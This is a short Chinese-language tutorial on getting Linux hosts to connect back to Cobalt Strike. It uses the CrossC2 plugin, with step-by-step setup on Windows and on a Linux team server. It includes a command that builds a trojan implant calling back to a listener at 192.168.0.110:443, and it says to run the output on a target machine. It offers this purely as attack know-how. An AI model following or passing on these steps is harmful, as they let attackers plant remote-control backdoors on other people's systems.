Cobalt Strike在Linux上线攻击方法详解

01

在Windows平台上生成可上线Linux的木马

1.1 下载插件

一般情况下，Cobalt Strike只能上线Windows主机。要实现Linux主机上线到Cobalt Strike，需要使用CrossC2插件。

在Windows端生成木马时，需要下载以下两个文件：

• CrossC2-GithubBot-2022-06-07.cna
• genCrossC2.Win.zip

下载地址：https://github.com/gloxec/CrossC2/releases/

解压genCrossC2.Win.zip后，将ucrtbased.dll放到C:\Windows\System32目录下。

然后在CrossC2-GithubBot-2022-06-07.cna中配置genCrossC2.win.exe的路径，注意使用双反斜杠。

最后，在团队服务器的目录下，将隐藏文件.cobaltstrike.beacon_keys与CrossC2-GithubBot-2022-06-07.cna和genCrossC2.Win.exe放在一起。

由于该插件只支持HTTPS，因此需要先建立一个HTTPS监听器。

在Cobalt Strike中加载插件后，即可生成可上线Linux的木马。

选择相应的监听器和Cobalt Strike版本范围后，点击生成木马。

成功生成后，在文件夹下找到t_cc2.out文件，并将其放到Linux中执行，即可成功上线。

02

在Linux平台下生成可上线Linux的木马

2.1 下载插件

下载genCrossC2.Linux文件，并将其放到团队服务器的根目录下。

确保服务器上已经存在一个HTTPS监听器。

给genCrossC2.Linux赋予执行权限后，使用以下命令生成木马：

<code>./genCrossC2.Linux 192.168.0.110 443 ./.cobaltstrike.beacon_keys null Linux x64 /tmp/test</code>

成功生成木马后，在/tmp目录下找到相应文件。

给生成的木马文件赋予执行权限并运行，即可成功上线。